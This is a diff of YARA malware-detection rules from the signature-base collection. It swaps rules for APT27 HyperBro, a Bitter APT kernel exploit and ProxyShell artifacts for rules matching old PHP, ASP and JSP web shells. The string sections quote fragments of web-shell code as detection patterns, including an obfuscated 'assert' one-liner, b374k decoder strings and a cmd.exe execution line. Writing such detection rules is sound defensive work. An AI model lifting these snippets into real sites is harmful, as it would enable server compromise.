+		description = "Web Shell - file B374k.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "300eaadf-db0c-5591-84fc-abdf7cdd90c1"
-		date = "2021-11-01"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
 		modified = "2025-11-03"
-		reference = "https://www.deepinstinct.com/blog/do-not-exchange-it-has-a-shell-inside"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/expl_proxyshell.yar#L257-L271"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L666-L682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d9812d3f53c346c4e318609e0c7de66811b27ffa7528a6ddeb6ac8436da59ef5"
-		score = 85
+		hash = "bed7388976f8f1d90422e8795dff1ea6"
+		logic_hash = "1f0fc5e309dd67a11d6ba9b698fd9ca3c7e6616545c220de79aaa3b63f0ad931"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s01 = ".LoadXml(System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(Request[" ascii wide
-		$s02 = "new System.IO.MemoryStream()" ascii wide
-		$s03 = "Transform(" ascii wide
+		$s0 = "Http://code.google.com/p/b374k-shell" fullword
+		$s1 = "$_=str_rot13('tm'.'vas'.'yngr');$_=str_rot13(strrev('rqb'.'prq'.'_'.'46r'.'fno'"
+		$s3 = "Jayalah Indonesiaku & Lyke @ 2013" fullword
+		$s4 = "B374k Vip In Beautify Just For Self" fullword
 
 	condition:
-		all of ( $s* )
+		1 of them
 }
-rule SIGNATURE_BASE_No_Powershell : FILE
+rule SIGNATURE_BASE_Webshell_Cmd_Asp_5_1
 {
 	meta:
-		description = "Detects an C# executable used to circumvent PowerShell detection - file nps.exe"
+		description = "Web Shell - file cmd-asp-5.1.asp"
 		author = "Florian Roth (Nextron Systems)"
-		id = "362a61bc-2c10-5076-93be-9f8b5a9ae8ba"
-		date = "2016-05-21"
-		modified = "2023-12-05"
-		reference = "https://github.com/Ben0xA/nps"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_nopowershell.yar#L8-L23"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L683-L696"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9fba467cfbf8cad0c8e6cf1e1c7eacd8b0be869ebe6c5180f50f5cdefa8b5bb5"
-		score = 80
+		hash = "8baa99666bf3734cbdfdd10088e0cd9f"
+		logic_hash = "1ff4ae8c08cec4605594e97d6c077d4808d3a73c04ddf6a51952252dd2d01cf4"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "64f811b99eb4ae038c88c67ee0dc9b150445e68a2eb35ff1a0296533ae2edd71"
 
 	strings:
-		$s1 = "nps.exe -encodedcommand {base64_encoded_command}" fullword wide
-		$s2 = "c:\\Development\\ghps\\nps\\nps\\obj\\x86\\Release\\nps.pdb" fullword ascii
+		$s9 = "Call oS.Run(\"win.com cmd.exe /c \"\"\" & szCMD & \" > \" & szTF &" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 40KB and ( 1 of ( $s* ) ) ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_EXT_APT_Bitter_Win32K_0Day_Feb21 : FILE
+rule SIGNATURE_BASE_Webshell_Php_Dodo_Zip
 {
 	meta:
-		description = "Detects code that exploits a Windows 0day exploited by Bitter APT group"
-		author = "dbappsecurity_lieying_lab"
-		id = "b1892b52-4b94-5571-ad63-8750a321f1f2"
-		date = "2021-01-01"
-		modified = "2023-12-05"
-		reference = "https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bitter.yar#L2-L21"
+		description = "Web Shell - file zip.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L697-L711"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "84a8d0ae14469eb6431e73295d821609c7a8b313630d645085ffd8faff6e5e43"
-		score = 75
+		hash = "b7800364374077ce8864796240162ad5"
+		logic_hash = "bdeffafdedeadaba36c5c67f981c42d6111b954622780b930e9eeb9956c638b5"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "NtUserConsoleControl" ascii wide
-		$s2 = "NtCallbackReturn" ascii wide
-		$s3 = "CreateWindowEx" ascii wide
-		$s4 = "SetWindowLong" ascii wide
-		$a1 = {48 C1 E8 02 48 C1 E9 02 C7 04 8A}
-		$a2 = {66 0F 1F 44 00 00 80 3C 01 E8 74 22 FF C2 48 FF C1}
-		$a3 = {48 63 05 CC 69 05 00 8B 0D C2 69 05 00 48 C1 E0 20 48 03 C1}
+		$s0 = "$hexdtime = '\\x' . $dtime[6] . $dtime[7] . '\\x' . $dtime[4] . $dtime[5] . '\\x"
+		$s3 = "$datastr = \"\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $s* ) and 1 of ( $a* )
+		all of them
 }
-
-rule SIGNATURE_BASE_APT_RU_APT27_Hyperbro_Vftrace_Loader_Jan22_1 : FILE
+rule SIGNATURE_BASE_Webshell_Azrailphp_V1_0
 {
 	meta:
-		description = "Yara rule to detect first Hyperbro Loader Stage, often called vftrace.dll. Detects decoding function."
-		author = "Bundesamt fuer Verfassungsschutz (modified by Florian Roth)"
-		id = "b049e163-2694-5fb9-a3a3-98cc77bcd0ca"
-		date = "2022-01-14"
-		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L3-L19"
+		description = "Web Shell - file aZRaiLPhp v1.0.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L712-L726"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "d8785ea937891636bea5ed8128de44fa6084a1a48800c1586739c5ca9e4c43bd"
-		score = 75
+		hash = "26b2d3943395682e36da06ed493a3715"
+		logic_hash = "d0ccf9e37e378db4523d7918b30cff358115e7a4c36fad55a75f3aff218563c6"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		sharing = "TLP:WHITE"
-		hash1 = "333B52C2CFAC56B86EE9D54AEF4F0FF4144528917BC1AA1FE1613EFC2318339A"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$decoder_routine = { 8A ?? 41 10 00 00 8B ?? 28 ?? ?? 4? 3B ?? 72 ?? }
+		$s5 = "echo \" <font color='#0000FF'>CHMODU \".substr(base_convert(@fileperms($"
+		$s7 = "echo \"<a href='./$this_file?op=efp&fname=$path/$file&dismi=$file&yol=$path'><fo"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5MB and $decoder_routine and pe.exports ( "D_C_Support_SetD_File" )
+		all of them
 }
-
-rule SIGNATURE_BASE_APT_CN_APT27_Compromised_Certficate_Jan22_1
+rule SIGNATURE_BASE_Webshell_Php_List
 {
 	meta:
-		description = "Detects compromised certifcates used by APT27 malware"
+		description = "Web Shell - file list.php"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f2f015af-219d-51ab-9529-01687a879ebb"
-		date = "2022-01-29"
-		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/SharedDocs/publikationen/DE/cyberabwehr/2022-01-bfv-cyber-brief.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L21-L34"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L727-L742"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "94a40d55936fc341eaba5e1accc8bfe3a401114298e7a3cc4d5c64af36eadf9e"
-		score = 80
+		hash = "922b128ddd90e1dc2f73088956c548ed"
+		logic_hash = "007f9307493bca71dcbdcf6ba6c45bf36899e8f636ccbd09c26453cb0aea0847"
+		score = 70
 		quality = 85
 		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s1 = "// list.php = Directory & File Listing" fullword
+		$s2 = "    echo \"( ) <a href=?file=\" . $fichero . \"/\" . $filename . \">\" . $filena"
+		$s9 = "// by: The Dark Raver" fullword
 
 	condition:
-		for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . issuer contains "DigiCert SHA2 Assured ID Code Signing CA" and pe.signatures [ i ] . serial == "08:68:70:51:50:f1:cf:c1:fc:c3:fc:91:a4:49:49:a6" )
+		1 of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Decrypted_Stage2 : FILE
+rule SIGNATURE_BASE_Webshell_Ironshell
 {
 	meta:
-		description = "HyperBro Stage 2 and compressed Stage 3 detection"
-		author = "Moritz Oettle"
-		id = "039e5d41-eadb-5c53-82cd-20ffd4105326"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L35-L57"
+		description = "Web Shell - file ironshell.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L743-L757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6eb56c4a92e89977e536ccc3c70170062aca072c6981b40aeea184ea2ca461a6"
-		score = 75
+		hash = "8bfa2eeb8a3ff6afc619258e39fded56"
+		logic_hash = "7e4916010a33383cfc3cbbcd5d575ac2f3a579220b66bd07e3121f3db30da66d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$lznt1_compressed_pe_header_small = { FC B9 00 4D 5A 90 }
-		$lznt1_compressed_pe_header_large_1 = { FC B9 00 4D 5A 90 00 03 00 00 00 82 04 00 30 FF FF 00 }
-		$lznt1_compressed_pe_header_large_2 = { 00 b8 00 38 0d 01 00 40 04 38 19 00 10 01 00 00 }
-		$lznt1_compressed_pe_header_large_3 = { 00 0e 1f ba 0e 00 b4 09 cd 00 21 b8 01 4c cd 21 }
-		$lznt1_compressed_pe_header_large_4 = { 54 68 00 69 73 20 70 72 6f 67 72 00 61 6d 20 63 }
-		$lznt1_compressed_pe_header_large_5 = { 61 6e 6e 6f 00 74 20 62 65 20 72 75 6e 00 20 69 }
-		$lznt1_compressed_pe_header_large_6 = { 6e 20 44 4f 53 20 00 6d 6f 64 65 2e 0d 0d 0a 02 }
+		$s4 = "print \"<form action=\\\"\".$me.\"?p=cmd&dir=\".realpath('.').\""
+		$s8 = "print \"<td id=f><a href=\\\"?p=rename&file=\".realpath($file).\"&di"
 
 	condition:
-		filesize < 200KB and ( $lznt1_compressed_pe_header_small at 0x9ce ) or ( all of ( $lznt1_compressed_pe_header_large_* ) )
+		all of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3 : FILE
+rule SIGNATURE_BASE_Webshell_Caidao_Shell_404
 {
 	meta:
-		description = "HyperBro Stage 3 detection - also tested in memory"
-		author = "Markus Poelloth"
-		id = "b4002777-f129-5177-a8f1-690012a207fa"
-		date = "2022-02-07"
-		modified = "2023-01-07"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L59-L84"
+		description = "Web Shell - file 404.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L758-L771"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "49c1e70d63d93244b4b44525f2b30c05512b5f3a30d6d7c43c9366a95c84e79b"
-		score = 50
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
-
-	strings:
-		$s1 = "\\cmd.exe /A" wide
-		$s2 = "vftrace.dll" fullword wide
-		$s3 = "msmpeng.exe" fullword wide
-		$s4 = "\\\\.\\pipe\\testpipe" fullword wide
-		$s5 = "thumb.dat" fullword wide
-		$g1 = "%s\\%d.exe" fullword wide
-		$g2 = "https://%s:%d/api/v2/ajax" fullword wide
-		$g3 = " -k networkservice" fullword wide
-		$g4 = " -k localservice" fullword wide
+		hash = "ee94952dc53d9a29bdf4ece54c7a7aa7"
+		logic_hash = "0743d18bc5066c96cca8cc0883971d3bc876e6c2fbb996e55b6930c715e07395"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+
+	strings:
+		$s0 = "<?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_POST[ice];IF($M==NuLl)HeaDeR('St"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( ( 4 of ( $s* ) ) or ( 4 of ( $g* ) ) )
+		all of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_C2
+rule SIGNATURE_BASE_Webshell_ASP_Aspydrv
 {
 	meta:
-		description = "HyperBro Stage 3 C2 path and user agent detection - also tested in memory"
-		author = "Marc Stroebel"
-		id = "d1fe03b9-440c-5127-9572-dddcd5c9966b"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L86-L100"
+		description = "Web Shell - file aspydrv.asp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L772-L785"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "676df1eaa782c6b876df138a0ddddc3c63e277b84d4414b044314ee219674420"
-		score = 50
-		quality = 81
+		hash = "de0a58f7d1e200d0b2c801a94ebce330"
+		logic_hash = "a4a6205ace49778ddc421b0f0e65c576e2ffe40ce2ab84debb939d5324420405"
+		score = 70
+		quality = 85
 		tags = ""
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "api/v2/ajax" ascii wide nocase
-		$s2 = "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36" ascii wide nocase
+		$s3 = "<%=thingy.DriveLetter%> </td><td><tt> <%=thingy.DriveType%> </td><td><tt> <%=thi"
 
 	condition:
 		all of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Stage3_Persistence
+rule SIGNATURE_BASE_Webshell_Jsp_Web
 {
 	meta:
-		description = "HyperBro Stage 3 registry keys for persistence"
-		author = "Marko Dorfhuber"
-		id = "2bb1d28b-5fc4-5f0b-b546-c8b8192b0d48"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L103-L117"
+		description = "Web Shell - file web.jsp"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L786-L799"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "db4b7be2bafe29b5e7c81a90e17a660cf73cff1c2e8edd04a9421daba09e3e0e"
-		score = 75
+		hash = "4bc11e28f5dccd0c45a37f2b541b2e98"
+		logic_hash = "ed0ace0ba5f8a9e763353c42e3e3a39da10596e8517aad33e5c5080b44e4d61a"
+		score = 70
 		quality = 85
 		tags = ""
-		hash1 = "624e85bd669b97bc55ed5c5ea5f6082a1d4900d235a5d2e2a5683a04e36213e8"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$ = "SOFTWARE\\WOW6432Node\\Microsoft\\config_" ascii
-		$ = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\windefenders" ascii
+		$s0 = "<%@page import=\"java.io.*\"%><%@page import=\"java.net.*\"%><%String t=request."
 
 	condition:
-		1 of them
+		all of them
 }
-rule SIGNATURE_BASE_Hvs_APT27_Hyperbro_Encrypted_Stage2 : FILE
+rule SIGNATURE_BASE_Webshell_Mysqlwebsh
 {
 	meta:
-		description = "HyperBro Encrypted Stage 2 detection. Looks for all possible one byte shifts of the lznt1 compressed PE header"
-		author = "Moritz Oettle"
-		id = "fa4fe057-4c3f-5785-a8d3-588398360996"
-		date = "2022-02-07"
-		modified = "2023-12-05"
-		reference = "https://www.hvs-consulting.de/en/threat-intelligence-report-emissary-panda-apt27"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt27_hyperbro.yar#L120-L389"
+		description = "Web Shell - file mysqlwebsh.php"
+		author = "Florian Roth (Nextron Systems)"
+		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
+		date = "2014-01-28"
+		modified = "2025-11-03"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/thor-webshells.yar#L800-L813"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "c3b07bdb19730fc9c8cca8aa7581a32eb80e3dbc5c4d366fbb2f9966081c1a21"
-		score = 75
-		quality = 60
-		tags = "FILE"
-		hash1 = "fc5a58bf0fce9cb96f35ee76842ff17816fe302e3164bc7c6a5ef46f6eff67ed"
+		hash = "babfa76d11943a22484b3837f105fada"
+		logic_hash = "365d19c086b3bbb98cbe1e1ed1e7522ce98dc2614a39c747717c277cebef33d2"
+		score = 70
+		quality = 85
+		tags = ""
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$encrypted_pe_header_shift_0 = { fc b9 00 4d 5a 90 00 03 00 00 00 82 04 00 30 ff ff 00 }
-		$encrypted_pe_header_shift_1 = { fd ba 01 4e 5b 91 01 04 01 01 01 83 05 01 31 00 00 01 }
-		$encrypted_pe_header_shift_2 = { fe bb 02 4f 5c 92 02 05 02 02 02 84 06 02 32 01 01 02 }
-		$encrypted_pe_header_shift_3 = { ff bc 03 50 5d 93 03 06 03 03 03 85 07 03 33 02 02 03 }
-		$encrypted_pe_header_shift_4 = { 00 bd 04 51 5e 94 04 07 04 04 04 86 08 04 34 03 03 04 }
-		$encrypted_pe_header_shift_5 = { 01 be 05 52 5f 95 05 08 05 05 05 87 09 05 35 04 04 05 }
-		$encrypted_pe_header_shift_6 = { 02 bf 06 53 60 96 06 09 06 06 06 88 0a 06 36 05 05 06 }
-		$encrypted_pe_header_shift_7 = { 03 c0 07 54 61 97 07 0a 07 07 07 89 0b 07 37 06 06 07 }
-		$encrypted_pe_header_shift_8 = { 04 c1 08 55 62 98 08 0b 08 08 08 8a 0c 08 38 07 07 08 }
-		$encrypted_pe_header_shift_9 = { 05 c2 09 56 63 99 09 0c 09 09 09 8b 0d 09 39 08 08 09 }
-		$encrypted_pe_header_shift_10 = { 06 c3 0a 57 64 9a 0a 0d 0a 0a 0a 8c 0e 0a 3a 09 09 0a }
-		$encrypted_pe_header_shift_11 = { 07 c4 0b 58 65 9b 0b 0e 0b 0b 0b 8d 0f 0b 3b 0a 0a 0b }
-		$encrypted_pe_header_shift_12 = { 08 c5 0c 59 66 9c 0c 0f 0c 0c 0c 8e 10 0c 3c 0b 0b 0c }
-		$encrypted_pe_header_shift_13 = { 09 c6 0d 5a 67 9d 0d 10 0d 0d 0d 8f 11 0d 3d 0c 0c 0d }
-		$encrypted_pe_header_shift_14 = { 0a c7 0e 5b 68 9e 0e 11 0e 0e 0e 90 12 0e 3e 0d 0d 0e }
-		$encrypted_pe_header_shift_15 = { 0b c8 0f 5c 69 9f 0f 12 0f 0f 0f 91 13 0f 3f 0e 0e 0f }
-		$encrypted_pe_header_shift_16 = { 0c c9 10 5d 6a a0 10 13 10 10 10 92 14 10 40 0f 0f 10 }
-		$encrypted_pe_header_shift_17 = { 0d ca 11 5e 6b a1 11 14 11 11 11 93 15 11 41 10 10 11 }
-		$encrypted_pe_header_shift_18 = { 0e cb 12 5f 6c a2 12 15 12 12 12 94 16 12 42 11 11 12 }
-		$encrypted_pe_header_shift_19 = { 0f cc 13 60 6d a3 13 16 13 13 13 95 17 13 43 12 12 13 }
-		$encrypted_pe_header_shift_20 = { 10 cd 14 61 6e a4 14 17 14 14 14 96 18 14 44 13 13 14 }
-		$encrypted_pe_header_shift_21 = { 11 ce 15 62 6f a5 15 18 15 15 15 97 19 15 45 14 14 15 }
-		$encrypted_pe_header_shift_22 = { 12 cf 16 63 70 a6 16 19 16 16 16 98 1a 16 46 15 15 16 }
-		$encrypted_pe_header_shift_23 = { 13 d0 17 64 71 a7 17 1a 17 17 17 99 1b 17 47 16 16 17 }
-		$encrypted_pe_header_shift_24 = { 14 d1 18 65 72 a8 18 1b 18 18 18 9a 1c 18 48 17 17 18 }
-		$encrypted_pe_header_shift_25 = { 15 d2 19 66 73 a9 19 1c 19 19 19 9b 1d 19 49 18 18 19 }
-		$encrypted_pe_header_shift_26 = { 16 d3 1a 67 74 aa 1a 1d 1a 1a 1a 9c 1e 1a 4a 19 19 1a }
-		$encrypted_pe_header_shift_27 = { 17 d4 1b 68 75 ab 1b 1e 1b 1b 1b 9d 1f 1b 4b 1a 1a 1b }
-		$encrypted_pe_header_shift_28 = { 18 d5 1c 69 76 ac 1c 1f 1c 1c 1c 9e 20 1c 4c 1b 1b 1c }
-		$encrypted_pe_header_shift_29 = { 19 d6 1d 6a 77 ad 1d 20 1d 1d 1d 9f 21 1d 4d 1c 1c 1d }
-		$encrypted_pe_header_shift_30 = { 1a d7 1e 6b 78 ae 1e 21 1e 1e 1e a0 22 1e 4e 1d 1d 1e }
-		$encrypted_pe_header_shift_31 = { 1b d8 1f 6c 79 af 1f 22 1f 1f 1f a1 23 1f 4f 1e 1e 1f }
-		$encrypted_pe_header_shift_32 = { 1c d9 20 6d 7a b0 20 23 20 20 20 a2 24 20 50 1f 1f 20 }
-		$encrypted_pe_header_shift_33 = { 1d da 21 6e 7b b1 21 24 21 21 21 a3 25 21 51 20 20 21 }
-		$encrypted_pe_header_shift_34 = { 1e db 22 6f 7c b2 22 25 22 22 22 a4 26 22 52 21 21 22 }
-		$encrypted_pe_header_shift_35 = { 1f dc 23 70 7d b3 23 26 23 23 23 a5 27 23 53 22 22 23 }
-		$encrypted_pe_header_shift_36 = { 20 dd 24 71 7e b4 24 27 24 24 24 a6 28 24 54 23 23 24 }
-		$encrypted_pe_header_shift_37 = { 21 de 25 72 7f b5 25 28 25 25 25 a7 29 25 55 24 24 25 }
-		$encrypted_pe_header_shift_38 = { 22 df 26 73 80 b6 26 29 26 26 26 a8 2a 26 56 25 25 26 }
-		$encrypted_pe_header_shift_39 = { 23 e0 27 74 81 b7 27 2a 27 27 27 a9 2b 27 57 26 26 27 }
-		$encrypted_pe_header_shift_40 = { 24 e1 28 75 82 b8 28 2b 28 28 28 aa 2c 28 58 27 27 28 }
-		$encrypted_pe_header_shift_41 = { 25 e2 29 76 83 b9 29 2c 29 29 29 ab 2d 29 59 28 28 29 }
-		$encrypted_pe_header_shift_42 = { 26 e3 2a 77 84 ba 2a 2d 2a 2a 2a ac 2e 2a 5a 29 29 2a }
-		$encrypted_pe_header_shift_43 = { 27 e4 2b 78 85 bb 2b 2e 2b 2b 2b ad 2f 2b 5b 2a 2a 2b }
-		$encrypted_pe_header_shift_44 = { 28 e5 2c 79 86 bc 2c 2f 2c 2c 2c ae 30 2c 5c 2b 2b 2c }
-		$encrypted_pe_header_shift_45 = { 29 e6 2d 7a 87 bd 2d 30 2d 2d 2d af 31 2d 5d 2c 2c 2d }
-		$encrypted_pe_header_shift_46 = { 2a e7 2e 7b 88 be 2e 31 2e 2e 2e b0 32 2e 5e 2d 2d 2e }
-		$encrypted_pe_header_shift_47 = { 2b e8 2f 7c 89 bf 2f 32 2f 2f 2f b1 33 2f 5f 2e 2e 2f }
-		$encrypted_pe_header_shift_48 = { 2c e9 30 7d 8a c0 30 33 30 30 30 b2 34 30 60 2f 2f 30 }
-		$encrypted_pe_header_shift_49 = { 2d ea 31 7e 8b c1 31 34 31 31 31 b3 35 31 61 30 30 31 }
-		$encrypted_pe_header_shift_50 = { 2e eb 32 7f 8c c2 32 35 32 32 32 b4 36 32 62 31 31 32 }
-		$encrypted_pe_header_shift_51 = { 2f ec 33 80 8d c3 33 36 33 33 33 b5 37 33 63 32 32 33 }
-		$encrypted_pe_header_shift_52 = { 30 ed 34 81 8e c4 34 37 34 34 34 b6 38 34 64 33 33 34 }
-		$encrypted_pe_header_shift_53 = { 31 ee 35 82 8f c5 35 38 35 35 35 b7 39 35 65 34 34 35 }
-		$encrypted_pe_header_shift_54 = { 32 ef 36 83 90 c6 36 39 36 36 36 b8 3a 36 66 35 35 36 }
-		$encrypted_pe_header_shift_55 = { 33 f0 37 84 91 c7 37 3a 37 37 37 b9 3b 37 67 36 36 37 }
-		$encrypted_pe_header_shift_56 = { 34 f1 38 85 92 c8 38 3b 38 38 38 ba 3c 38 68 37 37 38 }
-		$encrypted_pe_header_shift_57 = { 35 f2 39 86 93 c9 39 3c 39 39 39 bb 3d 39 69 38 38 39 }
-		$encrypted_pe_header_shift_58 = { 36 f3 3a 87 94 ca 3a 3d 3a 3a 3a bc 3e 3a 6a 39 39 3a }
